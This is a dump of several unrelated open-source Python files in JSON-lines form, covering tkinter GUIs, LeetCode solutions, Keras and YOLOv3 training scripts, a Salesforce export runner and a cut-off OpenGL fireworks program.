\n return\n\n\ndef launch_github():\n webbrowser.open(\"https://www.github.com/ZAdamMac/python-enigma\")\n return\n\n\nif __name__ == \"__main__\":\n machine_used = initialize_stock_enigma()\n window = Tk()\n window.title(\"Python Enigma v.%s\" % __version__)\n # this code block draws the window itself.\n input_pane = LabelFrame(window, text=\"Input\")\n input_pane.grid(column=0, row=0)\n input_field = Text(input_pane, width=80, height=24)\n input_field.pack()\n output_pane = LabelFrame(window, text=\"Output\")\n output_pane.grid(column=0, row=1)\n output_field = Text(output_pane, width=80, height=24)\n output_field.pack()\n window.update() # Needed because we're taking some dynamic sizes!\n settings_pane = LabelFrame(window, text=\"Machine State\", height=input_pane.winfo_height(), width=537)\n settings_pane.grid_propagate(0)\n settings_pane.grid(column=1, row=0)\n controls_pane = Frame(window)\n controls_pane.grid(column=1, row=1)\n\n # This code populates the various items that need to go in the settings pane\n # This pane uses grid geometry.\n wheel_selections = Button(settings_pane, command=test_button, text=\"Select Wheels\") # TODO Define Correct Command\n wheel_selections.grid_anchor(CENTER)\n wheel_selections.grid(column=0, row=0)\n stecker_config = Button(settings_pane, command=test_button, text=\"Steckerboard Config\")\n stecker_config.grid_anchor(CENTER)\n stecker_config.grid(column=1, row=0)\n wheel_states = LabelFrame(settings_pane, text=\"Wheel States\")\n wheel_states.grid_anchor(CENTER)\n #filler = Label(wheel_states, text=\"We don't fill this frame because that requires a function not yet defined!\")\n wheel_states.grid(row=1, columnspan=2)\n wheel_states.grid_anchor(CENTER)\n fill_wheel_states()\n #filler.pack()\n\n # This code populates the various items that need to go in the controls pane!\n go_button = Button(controls_pane, text=\"Process Message\", command=test_button, width=25) # TODO The Do!\n reset_button = Button(controls_pane, text=\"Reset State\", command=test_button, width=25) # TODO def\n credits_button = Button(controls_pane, text=\"About python_enigma\", command=display_about_window, width=25)\n go_button.grid(row=0)\n reset_button.grid(row=1)\n credits_button.grid(row=2)\n\n window.mainloop()\n","repo_name":"ZAdamMac/python-enigma","sub_path":"python_enigma/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6586,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"43"} +{"seq_id":"33961538888","text":"# LeetCode 43: multiplying big numbers given as strings. The key observation:\n# after reversing both inputs, the digit product num1[i]*num2[j] contributes to\n# result[i+j] and result[i+j+1] (e.g. 7*8 = 56 puts 6 in slot i+j, 5 in slot i+j+1).\n\ndef reverse(string):\n # Pythonic string reversal, kept as a named helper for readability\n return string[::-1]\n\ndef multiply(num1: str, num2: str):\n # NOTE: returns the product's digits as a little-endian list (or the string '0')\n if num1 == '0' or num2 == '0':\n return '0'\n max_scoop = 0\n result = [0] * 15000\n len1 = len(num1)\n len2 = len(num2)\n num1 = reverse(num1)\n num2 = reverse(num2)\n index_sum_max = len1 + len2 - 2\n for index_sum in range(index_sum_max + 1):\n for i in range(min(index_sum+1,len1)):\n j = index_sum - i\n if j >= len2:\n continue\n i_m_j = reverse(str(int(num1[i])*int(num2[j])))\n k = index_sum\n result[k] += int(i_m_j[0])\n max_scoop = k if k > max_scoop else max_scoop\n while result[k] >= 10:\n result[k] -= 10\n k+=1\n result[k] += 1\n max_scoop = k if k > max_scoop else max_scoop\n k+=1\n if len(i_m_j) > 1:\n k = index_sum+1\n result[k] += int(i_m_j[1])\n max_scoop = k if k > max_scoop else max_scoop\n while result[k] >= 10:\n result[k] -= 10\n k+=1\n result[k] += 1\n max_scoop = k if k > max_scoop else max_scoop
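\n # result now holds the product's digits in little-endian order; only\n # slots up to max_scoop were ever written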
\n return result[:max_scoop+1]\n\nif __name__ == '__main__':\n digits = multiply('9999','9999')\n product = reverse(''.join(str(d) for d in digits))\n print(product) # expected: 99980001","repo_name":"dyy401453043/algorithm_interview","sub_path":"big_number_multiply.py","file_name":"big_number_multiply.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"17913079469","text":"import sqlite3\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\n\r\n# connect to the database\r\nconn = sqlite3.connect('database.db')\r\nc = conn.cursor()\r\n\r\n# create the table if it does not exist yet\r\nc.execute('''CREATE TABLE IF NOT EXISTS inimesed\r\n (id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n nimi TEXT,\r\n aaddress TEXT,\r\n telo TEXT)''')\r\n\r\n# insert sample rows (note: these are re-inserted on every run)\r\nc.execute(\"INSERT INTO inimesed (nimi, aaddress, telo) VALUES ('Ülle Doos', 'kooli 7', '+372 1234 1234')\")\r\nc.execute(\"INSERT INTO inimesed (nimi, aaddress, telo) VALUES ('Jann Uuspõld', 'aafrika tn 13', '+372 1623 5678')\")\r\nc.execute(\"INSERT INTO inimesed (nimi, aaddress, telo) VALUES ('Rita Kurk', 'tallinna mnt 23', '+372 4321 9012')\")\r\n\r\n# commit the changes\r\nconn.commit()\r\n\r\n# create the tkinter window\r\nroot = tk.Tk()\r\nroot.title(\"People data\")\r\n\r\n# create a treeview for displaying the data\r\ntree = ttk.Treeview(root, columns=(\"nimi\", \"aaddress\", \"telo\"))\r\ntree.heading(\"#0\", text=\"ID\")\r\ntree.column(\"#0\", width=50)\r\ntree.heading(\"nimi\", text=\"Name\")\r\ntree.column(\"nimi\", width=150)\r\ntree.heading(\"aaddress\", text=\"Address\")\r\ntree.column(\"aaddress\", width=200)\r\ntree.heading(\"telo\", text=\"Phone\")\r\ntree.column(\"telo\", width=100)\r\ntree.grid(row=0, column=0, padx=5, pady=5)\r\n\r\n# function to display the data in the treeview\r\ndef show_data():\r\n # clear the existing rows\r\n for child in tree.get_children():\r\n tree.delete(child)\r\n\r\n # read the data from the database\r\n c.execute(\"SELECT * FROM inimesed\")\r\n data = c.fetchall()\r\n\r\n # show the rows in the treeview\r\n for row in data:\r\n tree.insert(\"\", \"end\", text=row[0], values=(row[1], row[2], row[3]))\r\n\r\n# function to add a new entry to the database\r\ndef add_entry():\r\n name = name_entry.get()\r\n address = address_entry.get()\r\n phone = phone_entry.get()\r\n c.execute(\"INSERT INTO inimesed (nimi, aaddress, telo) VALUES (?, ?, ?)\", (name, address, phone))\r\n conn.commit()\r\n show_data()\r\n name_entry.delete(0, tk.END)\r\n address_entry.delete(0, tk.END)\r\n phone_entry.delete(0, tk.END)\r\n\r\n# function to delete the selected row from the database\r\ndef delete_entry():\r\n selected = tree.focus()\r\n if selected:\r\n item_id = int(tree.item(selected)[\"text\"])\r\n c.execute(\"DELETE FROM inimesed WHERE id=?\", (item_id,))\r\n conn.commit()\r\n show_data()\r\n\r\n# labels and entry fields for adding a new record\r\nname_label = tk.Label(root, text=\"Name\")\r\nname_label.grid(row=1, column=0, padx=5, pady=5)\r\nname_entry = tk.Entry(root)\r\nname_entry.grid(row=1, column=1, padx=5, pady=5)\r\n\r\naddress_label = tk.Label(root, text=\"Address\")\r\naddress_label.grid(row=2, column=0, padx=5, pady=5)\r\naddress_entry = tk.Entry(root)\r\naddress_entry.grid(row=2, column=1, padx=5, pady=5)\r\n\r\nphone_label = tk.Label(root, text=\"Phone\")\r\nphone_label.grid(row=3, column=0, padx=5, pady=5)\r\nphone_entry = tk.Entry(root)\r\nphone_entry.grid(row=3, column=1, padx=5, pady=5)
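\r\n\r\n# the buttons below wire the add/delete helpers defined above to the UI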
\r\nadd_button = tk.Button(root, text=\"Add\", command=add_entry)\r\nadd_button.grid(row=4, column=0, padx=5, pady=5)\r\n\r\ndelete_button = tk.Button(root, text=\"Delete\", command=delete_entry)\r\ndelete_button.grid(row=4, column=1, padx=5, pady=5)\r\n\r\n\r\nshow_data()\r\n\r\nroot.mainloop()\r\n\r\nconn.close()","repo_name":"JassOunapuu/Andmebaasid","sub_path":"Ulesanne4.py","file_name":"Ulesanne4.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30865948762","text":"from typing import List\n\n\nclass Solution:\n    def minPairSum(self, nums: List[int]) -> int:\n        # Sort, then pair the smallest remaining element with the largest;\n        # the answer is the largest such pair sum. E.g. [3,5,4,2,4,6] sorts\n        # to [2,3,4,4,5,6] and pairs as (2,6), (3,5), (4,4) -> answer 8.\n        nums.sort()\n        max_pair_sum = 0\n        n = len(nums) - 1\n        for i in range(n + 1):\n            max_pair_sum = max(max_pair_sum, nums[i] + nums[n - i])\n        # O(n log n) time for the sort, O(1) extra space\n        return max_pair_sum\n\n\n# https://leetcode.com/problems/minimize-maximum-pair-sum-in-array/\n","repo_name":"mintesnot96/competitive-Programming-A2SV","sub_path":"1877. Minimize Maximum Pair Sum in Array leetcodeDSA.py","file_name":"1877. Minimize Maximum Pair Sum in Array leetcodeDSA.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"39474543252","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n# KERAS LIBRARIES\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.models import Sequential\nfrom keras.optimizers import SGD\n\n\nclass NetworkModel:\n\n # Defining constants...\n __random_seed = 7\n\n # # MODEL'S CONSTANTS\n __train_set_size = 0.7\n __test_set_size = 1 - __train_set_size\n\n __learning_rate = 0.025\n __batch_size = 20\n __epochs = 50\n\n model = None\n evaluation_result = dict()\n __test_set_x = None\n __test_set_y = None\n\n def __init__(self, path_to_claims, path_to_groundtruth):\n # Load all the claims\n print(\"Loading claims ...\")\n self.claims_input = pd.read_csv(path_to_claims)\n # Load the ground truth\n print(\"Loading ground truth ...\")\n self.ground_truth = pd.read_csv(path_to_groundtruth)\n self.__build_ground_truth_vector()\n\n def __build_ground_truth_vector(self):\n # Build the ground_truth vector.\n\n # tc_indexes is a dictionary that is used as an inverted index:\n # for each claim it tells us the position at which to put the value (1 / 0) for that claim\n tc_indexes = dict()\n tc_labels = np.array([], dtype=int)\n sources = set()\n\n # Add to the ground truth claims all the claims in the ground truth file and set each value to 1.\n # Also add all the claims with the same PropertyID and ObjectID\n # but with a different PropertyValue.\n # Also collect every source that says something into a set.\n for index, row in self.ground_truth.iterrows():\n tc_id = row[\"PropertyID\"] + \"|\" + row[\"ObjectID\"] + \"|\" + str(row[\"PropertyValue\"])\n if tc_id not in tc_indexes:\n tc_indexes[tc_id] = tc_labels.size\n tc_labels = np.append(tc_labels, 1)\n filtered_claims = self.claims_input[self.claims_input[\"PropertyID\"] == row[\"PropertyID\"]]\n filtered_claims = filtered_claims[filtered_claims[\"ObjectID\"] == row[\"ObjectID\"]]\n\n for idx, claim in filtered_claims.iterrows():\n if str(claim[\"PropertyValue\"]) != str(row[\"PropertyValue\"]):\n tc_id = claim[\"PropertyID\"] + \"|\" + claim[\"ObjectID\"] + \"|\" + str(claim[\"PropertyValue\"])\n if tc_id not in tc_indexes:
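\n # first time we see this competing value: register it and label it 0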
\n tc_indexes[tc_id] = tc_labels.size\n tc_labels = np.append(tc_labels, 0)\n sources.add(claim[\"SourceID\"])\n\n self.num_of_sources = len(sources)\n self.num_of_claims = tc_labels.size\n\n print(\"Number of claims :\", self.num_of_claims)\n print(\"Number of sources:\", self.num_of_sources)\n\n # Building the sensing matrix\n print(\"Building sensing matrix ...\")\n claims_matrix = []\n\n for source_num, source in enumerate(sources): # for each source\n claim_vector = np.zeros(len(tc_indexes), dtype=int) # initialize this source's claim vector\n\n source_claims = self.claims_input[self.claims_input[\"SourceID\"] == source]\n for index, row in source_claims.iterrows():\n row_claim = row[\"PropertyID\"] + \"|\" + row[\"ObjectID\"] + \"|\" + str(row[\"PropertyValue\"])\n if row_claim in tc_indexes:\n claim_vector[tc_indexes[row_claim]] = 1\n claims_matrix.append(claim_vector)\n if source_num % 200 == 0:\n print(\"Sources processed: %i \" % source_num)\n print(\"Done...\")\n\n claims_matrix = np.array(claims_matrix, dtype=int)\n\n sensing_matrix_with_truth = claims_matrix.transpose()\n\n tc_labels_shaped = tc_labels.reshape(sensing_matrix_with_truth.shape[0], 1)\n self.sensing_matrix_with_truth = np.append(sensing_matrix_with_truth, tc_labels_shaped, axis=1)\n\n def train_and_test_model(self, shl_units, thl_units, train_set_size=__train_set_size, random_seed=__random_seed):\n print(\"Splitting in test set and train set...\")\n self.__test_set_size = 1 - train_set_size\n\n train_set, test_set = train_test_split(self.sensing_matrix_with_truth, train_size=train_set_size,\n test_size=self.__test_set_size, random_state=random_seed)\n\n # # EXTRACT LABELS (Yt) and SAMPLES (X) for TRAIN-SET\n train_set_x = train_set[:, 0:train_set.shape[1] - 1]\n train_set_y = train_set[:, train_set.shape[1] - 1]\n\n # # EXTRACT LABELS (Yt) and SAMPLES (X) for TEST-SET\n self.__test_set_x = test_set[:, 0:test_set.shape[1]-1]\n self.__test_set_y = test_set[:, test_set.shape[1]-1]\n\n self.model = Sequential([\n Dense(units=self.num_of_sources, input_dim=self.num_of_sources, activation='relu'), # input layer\n Dropout(0.2, noise_shape=None, seed=random_seed),\n Dense(units=shl_units, activation='relu'), # first hidden layer\n Dense(units=thl_units, activation='relu'), # second hidden layer\n Dense(units=1, activation='sigmoid') # output layer, 1 neuron\n ])\n\n # # COMPILE THE MODEL\n\n # OPTIMIZER => SGD with a learning rate defined by the user.\n # LOSS => cross-entropy\n print(\"Compiling model ...\")\n self.model.compile(SGD(lr=self.__learning_rate), loss=\"binary_crossentropy\", metrics=[\"accuracy\"])\n\n print(\"Train Model...\")\n history = self.model.fit(train_set_x, train_set_y, batch_size=self.__batch_size, epochs=self.__epochs, verbose=0)\n\n print(\"Evaluating model ...
\")\n evaluation = self.model.evaluate(x=self.__test_set_x, y=self.__test_set_y, batch_size=self.__batch_size, verbose=0)\n self.evaluation_result[\"loss\"] = evaluation[0] * 100\n self.evaluation_result[\"accuracy\"] = evaluation[1] * 100\n\n def evaluate_model(self):\n return \"\\n%s: %.2f%% - %s: %.2f%%\" \\\n % (\"loss\", self.evaluation_result[\"loss\"], \"accuracy\", self.evaluation_result[\"accuracy\"])\n","repo_name":"mtnntn/atics_i","sub_path":"projects/first_project/NetworkModel.py","file_name":"NetworkModel.py","file_ext":"py","file_size_in_byte":6041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"32906187329","text":"# COPYRIGHT @ 2022 Simon, Sagstetter\r\nfrom main import (\r\nloadConfig,\r\nlogin,\r\nheaders,\r\ngetFileLink,\r\ndownloadFile\r\n)\r\n\r\nfrom settings import (\r\nResult\r\n)\r\n\r\nfrom sendmail import (\r\nsend_mail\r\n)\r\n\r\nprint('#### Starting Salesforce Export Data Downloader ####')\r\nCONFIG = loadConfig()\r\nprint('Configuration loaded...')\r\nRESP = login(CONFIG)\r\nprint('Login successfull...')\r\nRESULT = Result(RESP.text)\r\nLINK = getFileLink(RESULT, CONFIG)\r\nprint('Init download...')\r\nprint('Please wait...')\r\nFILE = downloadFile(LINK, RESULT, CONFIG)\r\nprint('Download Completed!')\r\nprint('Your file is located: ' + FILE)\r\nsend_mail(CONFIG)\r\n","repo_name":"simonsagstetter/salesforce-export-data-downloader","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"16721240092","text":"from tensorflow.keras.callbacks import ReduceLROnPlateau, EarlyStopping, ModelCheckpoint, TensorBoard\nfrom libs.detection.yolo.v3.layers import (yolo_v3_tiny)\nfrom libs.detection.caps.layers import capsules_yolo\nfrom libs.detection.losses import yolo_standard_loss\nfrom libs.detection.utils import get_anchors, data_generator_wrapper\nimport tensorflow as tf\nimport numpy as np\nimport argparse\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--tiny', default=False, type=bool, help='yolov3 or yolov3-tiny')\nparser.add_argument('--weights', default='./data/yolov3.tf', help='path to weights file')\nparser.add_argument('--classes', default='./data/wider_classes.txt', help='path to classes file')\nparser.add_argument('--dataset_path', default='D:/tensorflow_datasets/', help='path to download dataset')\nparser.add_argument('--pretrained', default=False, type=bool, help='pretrained model')\nparser.add_argument('--batch_size', default=1, type=int, help='batch size')\nparser.add_argument('--size', default=416, type=int, help='size image')\nparser.add_argument('--channels', default=3, type=int, help='channels')\nparser.add_argument('--training_path', default='./', help='train data path')\nparser.add_argument('--download_dataset', default=1, type=int, )\nparser.add_argument('--update_annotation', default=1, type=int, help='update annotation path to files')\nparser.add_argument('--epochs', default=100, type=int, help='epochs number')\n\nif __name__ == '__main__':\n args = parser.parse_args()\n size = args.size\n batch_size = args.batch_size\n epochs = args.epochs\n channels = args.channels\n class_names = ['face']\n training_path = args.training_path\n download_dataset = True if args.download_dataset == 1 else False\n update_annotation = True if args.update_annotation == 1 else False\n pretrained = True if args.pretrained == 1 else False\n num_classes = 
len(class_names)\n\n # ann_train, ann_test, ann_val = wider_dataset_annotations(args.dataset_path, download_dataset, update_annotation)\n\n ann_train, ann_test, ann_val = './wider_face/wider_face_train_annotation.txt', \\\n './wider_face/wider_face_test_annotation.txt', \\\n './wider_face/wider_face_val_annotation.txt'\n\n with open(ann_train) as f:\n train_lines = f.readlines()\n with open(ann_test) as f:\n test_lines = f.readlines()\n with open(ann_val) as f:\n val_lines = f.readlines()\n\n num_train = len(train_lines)\n num_val = len(val_lines)\n\n input_shape = (size, size)\n\n if args.tiny:\n anchors = get_anchors('resources/data/tiny_yolo_anchors.txt')\n masks = np.array([[3, 4, 5], [0, 1, 2]])\n model = yolo_v3_tiny(anchors, size=size, channels=channels, classes=num_classes, training=True)\n else:\n anchors = get_anchors('resources/data/yolo_anchors.txt')\n masks = np.array([[6, 7, 8], [3, 4, 5], [0, 1, 2]])\n model = capsules_yolo(anchors, size=size, channels=channels, classes=num_classes, training=True)\n\n grid_size = size // 32\n shape_input_image = (None, size, size, channels)\n shape_output_0_image = (None, grid_size, grid_size, 3, 6)\n shape_output_1_image = (None, grid_size * 2, grid_size * 2, 3, 6)\n shape_output_2_image = (None, grid_size * 4, grid_size * 4, 3, 6)\n\n dataset = tf.data.Dataset.from_generator(\n generator=lambda: map(tuple,\n data_generator_wrapper(train_lines, batch_size, input_shape, anchors)),\n output_types=(tf.float32, (tf.float32, tf.float32, tf.float32)),\n output_shapes=(shape_input_image, (shape_output_0_image, shape_output_1_image, shape_output_2_image)))\n val_dataset = tf.data.Dataset.from_generator(\n generator=lambda: map(tuple, data_generator_wrapper(val_lines, batch_size, input_shape, anchors)),\n output_types=(tf.float32, (tf.float32, tf.float32, tf.float32)),\n output_shapes=(shape_input_image, (shape_output_0_image, shape_output_1_image, shape_output_2_image)))\n\n loss = [yolo_standard_loss(anchors[mask], classes=num_classes) for mask in masks]\n optimizer = tf.keras.optimizers.Adam(lr=1e-3)\n\n model.compile(optimizer=optimizer, loss=loss)\n callbacks = [\n ReduceLROnPlateau(verbose=1),\n EarlyStopping(patience=3, verbose=1),\n ModelCheckpoint(training_path + '/checkpoints/yolov3_train_{epoch}.tf', verbose=1, save_weights_only=True),\n TensorBoard(log_dir='../../resources/data/logs')\n ]\n\n history = model.fit(dataset,\n steps_per_epoch=max(1, num_train // batch_size),\n validation_data=val_dataset,\n validation_steps=max(1, num_val // batch_size),\n epochs=args.epochs,\n initial_epoch=0,\n callbacks=callbacks)\n model.save_weights(f'{training_path}/yolov3_wider.tf')\n","repo_name":"ovchinnikov-vladislav/adaptive-classification-object-system","sub_path":"algorithms/train/yolo3_train_test/train_yolo3_wider.py","file_name":"train_yolo3_wider.py","file_ext":"py","file_size_in_byte":4932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26719881350","text":"\nfrom OpenGL.GL import *\nfrom OpenGL.GL.shaders import *\nfrom enum import Enum\n\nimport glfw\nimport glm\nimport math\nimport random\n\nimport numpy as np\nimport freetype as ft\n\n\nvertexShaderCode = \"\"\"\n\n# version 330 core\n\nlayout(location = 0) in vec3 aPos;\nlayout(location = 1) in vec4 aColor;\n\nout vec4 color;\n\nuniform mat4 prjMat;\nuniform mat4 viewMat;\nuniform mat4 modelMat;\n\nvoid main()\n{\n color = aColor;\n\n gl_Position = prjMat * viewMat * vec4(aPos, 1.0);\n}\n\n\"\"\"\n\nfragmentShaderCode = 
\"\"\"\n\n# version 330 core\n\nin vec4 color;\n\nout vec4 fragColor;\n\nvoid main()\n{\n fragColor = color;\n}\n\n\"\"\"\n\n\nclass Color(Enum):\n WHITE = (1.0, 1.0, 1.0)\n BLACK = (0.0, 0.0, 0.0)\n RED = (1.0, 0.0, 0.0)\n GREEN = (0.0, 1.0, 0.0)\n BLUE = (0.0, 0.0, 1.0)\n FPS_RED = (0.8, 0.3, 0.5)\n FPS_GREEN = (0.3, 0.8, 0.5)\n FPS_BLUE = (0.2, 0.3, 0.98)\n\nclass SceneManager:\n def __init__(self):\n self.displaySize = [800, 600]\n\n self.programInfoAreaVertices = []\n self.programInfoAreaIndices = []\n\n self.fovy = 45.0\n self.aspect = self.displaySize[0] / self.displaySize[1]\n self.near = 0.1\n self.far = 1000.0\n\n self.camera = None\n self.sailingCamera = [False, False]\n\n self.perspectivePrjMat = glm.mat4()\n self.orthoPrjMat = glm.mat4()\n self.viewMat = glm.mat4()\n\n self.objects = []\n self.maxNumFireworks = 1000\n self.fireworksCount = 0\n self.font = None\n\n self.deltaTime = 0.0\n self.dirty = True\n\n self.programInfo = True\n self.numProgramInfoElement = 6\n\n self.trail = False\n\n self.pause = False\n self.debug = False\n self.debugMat = glm.mat4()\n\n self._InitializeProgramInfoArea()\n\n def GetDisplaySize(self):\n return self.displaySize\n\n def SetDisplaySize(self, width, height):\n self.displaySize[0] = width\n self.displaySize[1] = height\n self.aspect = self.displaySize[0] / self.displaySize[1]\n\n self.dirty = True \n\n def GetCamera(self):\n return self.camera\n\n def SetCamera(self, camera):\n self.camera = camera\n\n def GetPerspectivePrjMat(self):\n return self.perspectivePrjMat\n\n def GetOrthoPrjMat(self):\n return self.orthoPrjMat\n\n def GetViewMat(self):\n return self.viewMat\n\n def GetPause(self):\n return self.pause\n\n def SetDirty(self, value):\n self.dirty = value\n\n def SetCameraPos(self):\n if gInputManager.GetKeyState('W') == True:\n self.camera.ProcessKeyboard('FORWARD', 0.05)\n self.dirty = True\n if gInputManager.GetKeyState('S') == True:\n self.camera.ProcessKeyboard('BACKWARD', 0.05)\n self.dirty = True\n if gInputManager.GetKeyState('A') == True:\n self.camera.ProcessKeyboard('LEFT', 0.05)\n self.dirty = True\n if gInputManager.GetKeyState('D') == True:\n self.camera.ProcessKeyboard('RIGHT', 0.05)\n self.dirty = True \n\n def SailCamera(self):\n if self.sailingCamera[0] == True:\n self.camera.ProcessKeyboard('FORWARD', 1.0)\n self.dirty = True\n if self.sailingCamera[1] == True:\n self.camera.ProcessKeyboard('BACKWARD', 1.0)\n self.dirty = True\n\n def InitializeOpenGL(self):\n glClearColor(Color.BLACK.value[0], Color.BLACK.value[1], Color.BLACK.value[2], 1.0)\n\n glEnable(GL_DEPTH_TEST)\n\n def MakeFont(self):\n self.font = Font('..\\Fonts\\comic.ttf', 14) \n self.font.MakeFontTextureWithGenList()\n\n def AddObject(self, object):\n if object.__class__.__name__ == \"Firework\":\n if random.random() < 0.5:\n if self.fireworksCount < self.maxNumFireworks:\n self.fireworksCount += 1\n\n object.SetTrail(self.trail)\n else:\n return\n else:\n return\n\n self.objects.append(object)\n\n def UpdateAboutInput(self):\n numObjects = len(self.objects)\n\n if gInputManager.GetKeyState('1') == True:\n self.sailingCamera[0] = not self.sailingCamera[0]\n gInputManager.SetKeyState('1', False)\n if gInputManager.GetKeyState('2') == True:\n self.sailingCamera[1] = not self.sailingCamera[1]\n gInputManager.SetKeyState('2', False)\n\n if gInputManager.GetKeyState('B') == True:\n self.debug = not self.debug\n gInputManager.SetKeyState('B', False)\n if gInputManager.GetKeyState('I') == True:\n self.programInfo = not self.programInfo\n 
gInputManager.SetKeyState('I', False)\n if gInputManager.GetKeyState('P') == True:\n self.pause = not self.pause\n gInputManager.SetKeyState('P', False)\n if gInputManager.GetKeyState('R') == True:\n for i in range(numObjects - 1, -1, -1):\n if self.objects[i].__class__.__name__ == \"Firework\":\n self.objects.pop(i)\n self.fireworksCount -= 1\n else:\n self.objects[i].Restart()\n gInputManager.SetKeyState('R', False)\n if gInputManager.GetKeyState('T') == True:\n self.trail = not self.trail\n gInputManager.SetKeyState('T', False)\n\n def Update(self, deltaTime):\n self.UpdateAboutInput()\n\n if self.pause == True:\n return\n\n numObjects = len(self.objects)\n\n for i in range(numObjects - 1, -1, -1):\n self.objects[i].Update(deltaTime)\n\n if self.objects[i].__class__.__name__ == \"Firework\":\n if self.objects[i].Done():\n self.objects.pop(i)\n self.fireworksCount -= 1\n\n self.SetCameraPos()\n\n self.SailCamera()\n\n if self.dirty == False:\n return\n\n self.perspectivePrjMat = glm.perspective(self.fovy, self.aspect, self.near, self.far)\n\n self.orthoPrjMat = glm.ortho(0, self.displaySize[0], 0, self.displaySize[1], -1.0, 1.0)\n\n self.viewMat = self.camera.GetViewMat()\n\n self.deltaTime += deltaTime\n self.dirty = False\n\n def DrawObjects(self):\n numObjects = len(self.objects)\n\n #print('numObjects: {0}'.format(numObjects))\n\n for i in range(numObjects):\n self.objects[i].Draw()\n\n def DrawProgramInfo(self, deltaTime):\n if self.programInfo == False:\n return\n \n glMatrixMode(GL_PROJECTION)\n glPushMatrix()\n glLoadIdentity()\n\n glOrtho(0, self.displaySize[0], 0, self.displaySize[1], -10.0, 10.0)\n\n glMatrixMode(GL_MODELVIEW)\n\n self._DrawProgramInfoArea()\n\n self._DrawProgramInfo(deltaTime)\n\n glMatrixMode(GL_PROJECTION)\n glPopMatrix()\n\n def _InitializeProgramInfoArea(self):\n programInfoAreaVerticesData = [\n 585.0, 590.0, -4.5, 1.0, 1.0, 1.0, 1.0,\n 785.0, 590.0, -4.5, 1.0, 1.0, 1.0, 1.0,\n 585.0, 587.0, -4.5, 1.0, 1.0, 1.0, 1.0,\n 785.0, 587.0, -4.5, 1.0, 1.0, 1.0, 1.0,\n\n 580.0, 570.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 580.0, 370.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 577.0, 570.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 577.0, 370.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n\n 585.0, 353.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 785.0, 353.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 585.0, 350.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 785.0, 350.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n\n 790.0, 570.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 790.0, 370.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 793.0, 570.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 793.0, 370.0, -4.5, 0.0, 0.0, 1.0, 0.8\n ]\n\n programInfoAreaIndicesData = [\n 0, 1,\n 2, 3,\n\n 4, 5, \n 6, 7,\n\n 8, 9, \n 10, 11,\n\n 12, 13,\n 14, 15\n ]\n\n self.programInfoAreaVertices = np.array(programInfoAreaVerticesData, dtype = np.float32)\n self.programInfoAreaIndices = np.array(programInfoAreaIndicesData, dtype = np.uint32)\n\n def _DrawProgramInfoArea(self):\n glPushMatrix()\n glLoadIdentity()\n\n glPushAttrib(GL_COLOR_BUFFER_BIT | GL_ENABLE_BIT | GL_LINE_BIT)\n\n glEnable(GL_BLEND)\n\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n\n glEnableClientState(GL_VERTEX_ARRAY)\n glEnableClientState(GL_COLOR_ARRAY)\n\n glVertexPointer(3, GL_FLOAT, self.programInfoAreaVertices.itemsize * 7, ctypes.c_void_p(self.programInfoAreaVertices.ctypes.data))\n glColorPointer(4, GL_FLOAT, self.programInfoAreaVertices.itemsize * 7, ctypes.c_void_p(self.programInfoAreaVertices.ctypes.data + self.programInfoAreaVertices.itemsize * 3))\n\n glDrawElements(GL_LINES, len(self.programInfoAreaIndices), GL_UNSIGNED_INT, 
self.programInfoAreaIndices)\n\n glDisableClientState(GL_VERTEX_ARRAY)\n glDisableClientState(GL_COLOR_ARRAY)\n\n glPopAttrib()\n\n glPopMatrix()\n \n def _DrawProgramInfo(self, deltaTime): \n glPushMatrix()\n glLoadIdentity()\n\n glPushAttrib(GL_COLOR_BUFFER_BIT | GL_ENABLE_BIT)\n\n glEnable(GL_TEXTURE_2D)\n glEnable(GL_BLEND)\n\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n\n texId = self.font.GetTexId()\n\n glBindTexture(GL_TEXTURE_2D, texId)\n\n glColor(Color.FPS_GREEN.value)\n\n infoText = []\n infoTextIndex = 0\n\n infoText.append('.FPS: {0: 0.2f}'.format(0.0))\n\n if deltaTime != 0.0:\n infoText[infoTextIndex] = \".FPS: {0: 0.2f}\".format(1.0 / deltaTime)\n\n infoText.append('.SailingDir(1, 2): ')\n infoTextIndex += 1\n\n if self.sailingCamera[0] == True:\n infoText[infoTextIndex] += \"F\"\n if self.sailingCamera[1] == True:\n infoText[infoTextIndex] += \"B\"\n\n infoText.append('.Pause(P): ')\n infoTextIndex += 1\n\n if self.pause == True:\n infoText[infoTextIndex] += \"On\"\n else:\n infoText[infoTextIndex] += \"Off\"\n\n infoText.append('.Debug(B): ')\n infoTextIndex += 1\n\n if self.debug == True:\n infoText[infoTextIndex] += \"On\"\n else:\n infoText[infoTextIndex] += \"Off\"\n\n infoText.append('.Add Trail(T): ')\n 